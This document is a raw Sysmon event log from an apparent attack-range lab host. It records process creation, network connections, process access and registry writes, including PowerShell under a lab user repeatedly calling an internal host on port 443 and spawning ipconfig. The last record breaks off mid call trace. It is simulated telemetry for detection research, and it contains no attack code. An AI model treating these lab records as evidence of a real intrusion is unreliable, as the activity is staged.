EventID=1 RecordID=36497954 UtcTime=2021-09-14 13:20:08.646 ; ProcessGuid={B81B27B7-A188-6140-9556-04000000C801} ; ProcessId=6784 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe ; FileVersion=10.0.10011.16384 ; Description=SplunkMonNoHandle Control Program ; Product=Windows (R) Win 7 DDK driver ; Company=Windows (R) Win 7 DDK provider ; OriginalFileName=SplunkMonNoHandle.exe ; CommandLine="C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe" ; CurrentDirectory=C:\Windows\system32\ ; User=NT AUTHORITY\SYSTEM ; LogonGuid={B81B27B7-4012-611D-E703-000000000000} ; LogonId=0x3e7 ; TerminalSessionId=0 ; IntegrityLevel=System ; Hashes=MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8 ; ParentProcessGuid={B81B27B7-4013-611D-2700-00000000C801} ; ParentProcessId=2076 ; ParentImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe ; ParentCommandLine="C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
EventID=10 RecordID=36497953 UtcTime=2021-09-14 13:20:08.131 ; SourceProcessGUID={B81B27B7-A187-6140-9456-04000000C801} ; SourceProcessId=5280 ; SourceThreadId=6400 ; SourceImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe ; TargetProcessGUID={B81B27B7-4013-611D-2700-00000000C801} ; TargetProcessId=2076 ; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe ; GrantedAccess=0x101400 ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=23 RecordID=36497965 UtcTime=2021-09-14 13:20:09.861 ; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ; ProcessId=2188 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; Hashes=MD5=52961D4B15C5D351155F56FC7FFA3E88,SHA256=FA3BDDDB47EF40A9A69DB40974A717F67F488B5B34B84E2C59E13CB323DE3A44,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=23 RecordID=36497964 UtcTime=2021-09-14 13:20:09.114 ; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ; ProcessId=2188 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security ; Hashes=MD5=3357F53858A2A3F9698DCFD110EAA3C0,SHA256=D8FD2C1DF0E380A0B5744B7E4B594451D659B9DEF2D610E73638DBDAE0FDF5BA,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=23 RecordID=36497963 UtcTime=2021-09-14 13:20:09.114 ; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ; ProcessId=2188 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security ; Hashes=MD5=1B9A37D6741E89E9998D9044B186D37C,SHA256=B8AF4B87BD56CD701E704ADE0CF5AE6EE12D92D5A3946EEF066C184E9608A8D7,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=3 RecordID=36497968 UtcTime=2021-09-14 13:20:39.947 ; ProcessGuid={B81B27B7-401D-611D-6900-00000000C801} ; ProcessId=3616 ; Image=C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe ; User=NT AUTHORITY\SYSTEM ; Protocol=tcp ; Initiated=true ; SourceIsIpv6=false ; SourceIp=10.0.1.15 ; SourceHostname=win-host-987.attackrange.local ; SourcePort=50598 ; SourcePortName=- ; DestinationIsIpv6=false ; DestinationIp=10.0.1.12 ; DestinationHostname=- ; DestinationPort=8000 ; DestinationPortName=-
EventID=23 RecordID=36497967 UtcTime=2021-09-14 13:20:10.879 ; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ; ProcessId=2188 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; Hashes=MD5=89290D28D32FE360ADB5C308664BFB2D,SHA256=F2ABF0CA5B3775738D33DF8DBAF2B8982481EC4D3D61052816D7F0C55E0785F6,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=23 RecordID=36497966 UtcTime=2021-09-14 13:20:10.860 ; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ; ProcessId=2188 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational ; Hashes=MD5=F43A52DBF49AB4A70905BFABF380D33D,SHA256=CDEDAB0CCA3736692F121BF2262120FE82772794A3857D92C064C2787D10B765,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=3 RecordID=36497970 UtcTime=2021-09-14 13:20:41.532 ; ProcessGuid={B81B27B7-4822-613A-788F-03000000C801} ; ProcessId=6940 ; Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; User=ATTACKRANGE\REED_SCHMIDT ; Protocol=tcp ; Initiated=true ; SourceIsIpv6=false ; SourceIp=10.0.1.15 ; SourceHostname=win-host-987.attackrange.local ; SourcePort=50599 ; SourcePortName=- ; DestinationIsIpv6=false ; DestinationIp=10.0.1.16 ; DestinationHostname=ip-10-0-1-16.us-west-2.compute.internal ; DestinationPort=443 ; DestinationPortName=https
EventID=23 RecordID=36497969 UtcTime=2021-09-14 13:20:11.896 ; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ; ProcessId=2188 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; Hashes=MD5=BDE6A7316EC3853872CEDCA7EE9E1251,SHA256=5D1565674F56F08F2EA11E1176DAE42395C40C32F7C7193725762BE6A7929B8A,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=23 RecordID=36497971 UtcTime=2021-09-14 13:20:12.927 ; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ; ProcessId=2188 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; Hashes=MD5=89318A49CF7889BAC828EC4C0BD63263,SHA256=B9816E465A92C3C0EC3163543166CE2A45FB423DD49A9A64EACB86451AA68DA3,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=23 RecordID=36497972 UtcTime=2021-09-14 13:20:13.927 ; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ; ProcessId=2188 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; Hashes=MD5=79A10865A653A64CA50F74D19209837A,SHA256=CF2A7C7C705805A752C6BCB9EF1B17F941F0F7C70034B7D9A80C3E1BE65BB2F3,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=23 RecordID=36497973 UtcTime=2021-09-14 13:20:14.957 ; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ; ProcessId=2188 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; Hashes=MD5=38A13C16D6C874CD6C217F9474793B27,SHA256=0B9E22FE4436D1789063CF0694A39F92F914A32209AAB494E29B08837C996B45,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=23 RecordID=36497984 UtcTime=2021-09-14 13:20:15.976 ; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ; ProcessId=2188 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; Hashes=MD5=D95FBC7520CA0D4EAD5D68F3BFEA2849,SHA256=2EF93B240B07C935AAB2558533240C8D5C11BE0DC89BF7C9514FC802C29A7DCC,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=13 RecordID=36497983 EventType=SetValue UtcTime=2021-09-14 13:20:15.194 ; ProcessGuid={B81B27B7-4012-611D-0B00-00000000C801} ; ProcessId=636 ; Image=C:\Windows\system32\lsass.exe ; TargetObject=HKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidence ; Details=DWORD (0x00000006)
EventID=13 RecordID=36497982 EventType=SetValue UtcTime=2021-09-14 13:20:15.194 ; ProcessGuid={B81B27B7-4012-611D-0B00-00000000C801} ; ProcessId=636 ; Image=C:\Windows\system32\lsass.exe ; TargetObject=HKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCount ; Details=QWORD (0x00000000-0x8a355b51)
EventID=13 RecordID=36497981 EventType=SetValue UtcTime=2021-09-14 13:20:15.194 ; ProcessGuid={B81B27B7-4012-611D-0B00-00000000C801} ; ProcessId=636 ; Image=C:\Windows\system32\lsass.exe ; TargetObject=HKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLow ; Details=QWORD (0x01d7a962-0xdfcca987)
EventID=13 RecordID=36497980 EventType=SetValue UtcTime=2021-09-14 13:20:15.194 ; ProcessGuid={B81B27B7-4012-611D-0B00-00000000C801} ; ProcessId=636 ; Image=C:\Windows\system32\lsass.exe ; TargetObject=HKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimated ; Details=QWORD (0x01d7a96b-0x41911187)
EventID=13 RecordID=36497979 EventType=SetValue UtcTime=2021-09-14 13:20:15.194 ; ProcessGuid={B81B27B7-4012-611D-0B00-00000000C801} ; ProcessId=636 ; Image=C:\Windows\system32\lsass.exe ; TargetObject=HKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHigh ; Details=QWORD (0x01d7a973-0xa3557987)
EventID=13 RecordID=36497978 EventType=SetValue UtcTime=2021-09-14 13:20:15.194 ; ProcessGuid={B81B27B7-4012-611D-0B00-00000000C801} ; ProcessId=636 ; Image=C:\Windows\system32\lsass.exe ; TargetObject=HKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidence ; Details=DWORD (0x00000006)
EventID=13 RecordID=36497977 EventType=SetValue UtcTime=2021-09-14 13:20:15.194 ; ProcessGuid={B81B27B7-4012-611D-0B00-00000000C801} ; ProcessId=636 ; Image=C:\Windows\system32\lsass.exe ; TargetObject=HKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCount ; Details=QWORD (0x00000000-0x8a355b51)
EventID=13 RecordID=36497976 EventType=SetValue UtcTime=2021-09-14 13:20:15.194 ; ProcessGuid={B81B27B7-4012-611D-0B00-00000000C801} ; ProcessId=636 ; Image=C:\Windows\system32\lsass.exe ; TargetObject=HKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLow ; Details=QWORD (0x01d7a962-0xdfcca987)
EventID=13 RecordID=36497975 EventType=SetValue UtcTime=2021-09-14 13:20:15.194 ; ProcessGuid={B81B27B7-4012-611D-0B00-00000000C801} ; ProcessId=636 ; Image=C:\Windows\system32\lsass.exe ; TargetObject=HKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimated ; Details=QWORD (0x01d7a96b-0x41911187)
EventID=13 RecordID=36497974 EventType=SetValue UtcTime=2021-09-14 13:20:15.194 ; ProcessGuid={B81B27B7-4012-611D-0B00-00000000C801} ; ProcessId=636 ; Image=C:\Windows\system32\lsass.exe ; TargetObject=HKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHigh ; Details=QWORD (0x01d7a973-0xa3557987)
EventID=23 RecordID=36497986 UtcTime=2021-09-14 13:20:16.992 ; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ; ProcessId=2188 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational ; Hashes=MD5=82CB9FBC86D541F3E45832E8F2C50DE6,SHA256=90C94D4AA18637B6C7790E8FD2EFED0401D71FFEB5DF4772406B295F58D4EC74,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=3 RecordID=36497985 UtcTime=2021-09-14 13:20:45.713 ; ProcessGuid={B81B27B7-401D-611D-6900-00000000C801} ; ProcessId=3616 ; Image=C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe ; User=NT AUTHORITY\SYSTEM ; Protocol=tcp ; Initiated=true ; SourceIsIpv6=false ; SourceIp=10.0.1.15 ; SourceHostname=win-host-987.attackrange.local ; SourcePort=50600 ; SourcePortName=- ; DestinationIsIpv6=false ; DestinationIp=10.0.1.12 ; DestinationHostname=- ; DestinationPort=8000 ; DestinationPortName=-
EventID=23 RecordID=36497987 UtcTime=2021-09-14 13:20:17.024 ; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ; ProcessId=2188 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; Hashes=MD5=BBAFF16AC368E6A4CCE4BEDC723FC929,SHA256=712BDE18736DC7B21F217B3C7A55BCBE542227A8D909EB3D2F68F9AB0EC946EB,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=3 RecordID=36497989 UtcTime=2021-09-14 13:20:47.543 ; ProcessGuid={B81B27B7-4822-613A-788F-03000000C801} ; ProcessId=6940 ; Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; User=ATTACKRANGE\REED_SCHMIDT ; Protocol=tcp ; Initiated=true ; SourceIsIpv6=false ; SourceIp=10.0.1.15 ; SourceHostname=win-host-987.attackrange.local ; SourcePort=50601 ; SourcePortName=- ; DestinationIsIpv6=false ; DestinationIp=10.0.1.16 ; DestinationHostname=ip-10-0-1-16.us-west-2.compute.internal ; DestinationPort=443 ; DestinationPortName=https
EventID=23 RecordID=36497988 UtcTime=2021-09-14 13:20:18.073 ; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ; ProcessId=2188 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; Hashes=MD5=0FDEEE1534E958691F3D3E924A5F2794,SHA256=E848F40F6025E5342FEB06508BECFF85117BE5B13D32661D8D12444DD6E5A963,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=23 RecordID=36497990 UtcTime=2021-09-14 13:20:19.079 ; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ; ProcessId=2188 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; Hashes=MD5=0A44BA62DE8F859E9F2EC7756F2CA0DE,SHA256=05A893093EB3DD01E3D182B8B5A3DFF3C4F17F25C01BAE8F7ECE5B4B784971FC,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=3 RecordID=36498001 UtcTime=2021-09-14 13:20:50.716 ; ProcessGuid={B81B27B7-401D-611D-6900-00000000C801} ; ProcessId=3616 ; Image=C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe ; User=NT AUTHORITY\SYSTEM ; Protocol=tcp ; Initiated=true ; SourceIsIpv6=false ; SourceIp=10.0.1.15 ; SourceHostname=win-host-987.attackrange.local ; SourcePort=50602 ; SourcePortName=- ; DestinationIsIpv6=false ; DestinationIp=10.0.1.12 ; DestinationHostname=- ; DestinationPort=8000 ; DestinationPortName=-
EventID=10 RecordID=36498000 UtcTime=2021-09-14 13:20:20.912 ; SourceProcessGUID={B81B27B7-9957-6127-D045-01000000C801} ; SourceProcessId=5312 ; SourceThreadId=1524 ; SourceImage=C:\Windows\system32\conhost.exe ; TargetProcessGUID={B81B27B7-A194-6140-9656-04000000C801} ; TargetProcessId=5924 ; TargetImage=C:\Windows\system32\ipconfig.exe ; GrantedAccess=0x1fffff ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10 RecordID=36497999 UtcTime=2021-09-14 13:20:20.896 ; SourceProcessGUID={B81B27B7-4012-611D-1400-00000000C801} ; SourceProcessId=884 ; SourceThreadId=4756 ; SourceImage=C:\Windows\system32\svchost.exe ; TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801} ; TargetProcessId=1820 ; TargetImage=C:\Windows\sysmon64.exe ; GrantedAccess=0x100000 ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10 RecordID=36497998 UtcTime=2021-09-14 13:20:20.881 ; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801} ; SourceProcessId=732 ; SourceThreadId=4464 ; SourceImage=C:\Windows\system32\svchost.exe ; TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801} ; TargetProcessId=1820 ; TargetImage=C:\Windows\sysmon64.exe ; GrantedAccess=0x1400 ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10 RecordID=36497997 UtcTime=2021-09-14 13:20:20.881 ; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801} ; SourceProcessId=732 ; SourceThreadId=4464 ; SourceImage=C:\Windows\system32\svchost.exe ; TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801} ; TargetProcessId=1820 ; TargetImage=C:\Windows\sysmon64.exe ; GrantedAccess=0x1400 ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10 RecordID=36497996 UtcTime=2021-09-14 13:20:20.881 ; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801} ; SourceProcessId=732 ; SourceThreadId=4464 ; SourceImage=C:\Windows\system32\svchost.exe ; TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801} ; TargetProcessId=1820 ; TargetImage=C:\Windows\sysmon64.exe ; GrantedAccess=0x1400 ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10 RecordID=36497995 UtcTime=2021-09-14 13:20:20.881 ; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801} ; SourceProcessId=732 ; SourceThreadId=4464 ; SourceImage=C:\Windows\system32\svchost.exe ; TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801} ; TargetProcessId=1820 ; TargetImage=C:\Windows\sysmon64.exe ; GrantedAccess=0x1400 ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10 RecordID=36497994 UtcTime=2021-09-14 13:20:20.881 ; SourceProcessGUID={B81B27B7-4130-611D-9D00-00000000C801} ; SourceProcessId=3160 ; SourceThreadId=3656 ; SourceImage=C:\Windows\system32\csrss.exe ; TargetProcessGUID={B81B27B7-A194-6140-9656-04000000C801} ; TargetProcessId=5924 ; TargetImage=C:\Windows\system32\ipconfig.exe ; GrantedAccess=0x1fffff ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventID=10 RecordID=36497993 UtcTime=2021-09-14 13:20:20.881 ; SourceProcessGUID={B81B27B7-4822-613A-788F-03000000C801} ; SourceProcessId=6940 ; SourceThreadId=4828 ; SourceImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; TargetProcessGUID={B81B27B7-A194-6140-9656-04000000C801} ; TargetProcessId=5924 ; TargetImage=C:\Windows\system32\ipconfig.exe ; GrantedAccess=0x1fffff ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9